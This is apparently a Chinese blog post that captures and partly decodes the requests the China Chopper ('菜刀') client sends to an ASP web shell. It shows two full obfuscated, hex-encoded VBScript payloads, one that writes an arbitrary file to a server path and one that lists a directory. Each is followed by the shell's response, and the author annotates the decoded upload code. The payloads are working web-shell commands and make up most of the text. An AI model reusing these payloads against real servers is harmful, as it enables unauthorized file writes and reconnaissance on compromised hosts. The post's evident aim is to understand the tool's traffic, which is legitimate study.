菜刀ASP 上传文件反应

http://blog.csdn.net/webxscan     神龙

webxscan=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D206C2C73732C66662C543A66663D6264287265717565737428227A312229293A73733D5265717565737428227A3222293A6C3D4C656E287373293A53657420533D5365727665722E4372656174654F626A656374282241646F

64622E53747265616D22293A5769746820533A2E547970653D313A2E4D6F64653D333A2E4F70656E3A4966205265717565737428227A3322293E30205468656E3A2E4C6F616446726F6D46696C652022222666662622223A2E506F7369746

96F6E3D2E53697A653A456E642049663A7365742072733D4372656174654F626A656374282241444F44422E5265636F726473657422293A72732E6669656C64732E617070656E6420226262222C3230352C6C2F323A72732E6F70656E3A72

732E6164646E65773A72732822626222293D73732B636872622830293A72732E7570646174653A2E57726974652072732822626222292E6765746368756E6B286C2F32293A72732E636C6F73653A5365742072733D4E6F7468696E673A2E5

06F736974696F6E3D303A2E53617665546F46696C652022222666662622222C323A2E436C6F73653A456E6420576974683A53657420533D4E6F7468696E673A496620457272205468656E3A543D4572722E4465736372697074696F6E3A45

72722E436C6561723A456C73653A543D2231223A456E642049663A526573706F6E73652E5772697465285429"""")):Response.Write(""""|<-""""):Response.End"")")

&z1=433A5C5C446F63756D656E747320616E642053657474696E67735C5C615C5CD7C0C3E65C5C7777775C5C2E5C5C3132332E747874&z2=313233343536&z3=0


Dim l,ss,ff,T
ff=bd(request("z1"))
'z1 上传路径 C:\\Documents and Settings\\a\\×ÀÃæ\\www\\.\\123.txt
ss=Request("z2")
'z2 文件内容 123456
l=Len(ss)
Set S=Server.CreateObject("Adodb.Stream")
With S
.Type=1
.Mode=3
.Open
If Request("z3")>0 Then
'z3  下面这2行啥意思啊
.LoadFromFile ""&ff&""
.Position=.Size
End If
set rs=CreateObject("ADODB.Recordset")
rs.fields.append "bb",205,l/2
rs.open:rs.addnew:rs("bb")=ss+chrb(0)
rs.update:.Write rs("bb").getchunk(l/2)
rs.close
Set rs=Nothing
.Position=0
.SaveToFile ""&ff&"",2
.Close
End With
Set S=Nothing
If Err Then
T=Err.Description
Err.Clear
Else
T="1"
End If
Response.Write(T)


->|1|<-

webxscan=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D2052523A52523D6264285265717565737428227A312229293A46756E6374696F6E204644286474293A46443D596561722864742926222D223A4966204C656E284D6F6E746828647429293D31205468656E3A4644203D204644

262230223A456E642049663A46443D4644264D6F6E74682864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D4644262230223A456E642049663A46443D464426446179286474292622202226466F726D6

1744461746554696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D31205468656E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E642046756E6374696F6E3A53

455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C646572282222265252262222293A496620457272205468656E3A526573706F6

E73652E577269746528224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F6E73652E57726974

6520462E4E616D6526636872283437292663687228392926464428462E446174654C6173744D6F646966696564292663687228392926636872283438292663687228392926432E476574466F6C64657228462E50617468292E61747472696

27574657326636872283130293A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E5772697465204C2E4E616D6526636872283929264644284C2E446174654C6173744D6F646966696564292663

6872283929264C2E73697A652663687228392926432E47657446696C65284C2E50617468292E6174747269627574657326636872283130293A4E6578743A456E64204966"""")):Response.Write(""""|<-""""):Response.End"")")

&z1=433A5C5C446F63756D656E747320616E642053657474696E67735C5C615C5CD7C0C3E65C5C7777775C5C2E5C5C





->|1121111111/    2016-05-06 22:17:08    0    16
bj1/    2016-05-06 22:17:09    0    16
css/    2016-05-06 22:17:09    0    16
img/    2016-05-06 22:17:09    0    16
ip2/    2016-05-06

22:17:09    0    16
js/    2016-05-06 22:17:09    0    16
ThinkPHP/    2016-05-06 22:17:16    0    16
zz/    2016-05-06 22:17:22    0    16
zz - 副本/    2016-05-06 22:17:24    

0    16
新建文件夹/    2016-05-06 22:17:25    0    16
.project    2016-04-05 06:48:00    1143    32
123.txt    2016-05-08 05:47:21    6    32
asp.asp    2016-04-30 01:08:10    

2613    32
Aws.exe    2013-03-22 08:50:42    654164    32
cs.php    2016-04-21 21:02:34    375    32
eval.asp    2016-05-06 22:13:14    28    32
eval.php    2016-04-06 12:13:02    

34    32
index.html    2016-04-05 06:48:00    123    32
web.sql    2016-04-10 22:38:32    25050    32
www.rar    2014-07-16 23:38:40    17318435    32
zz.rar    2014-07-16

22:49:38    3573855    32
|<-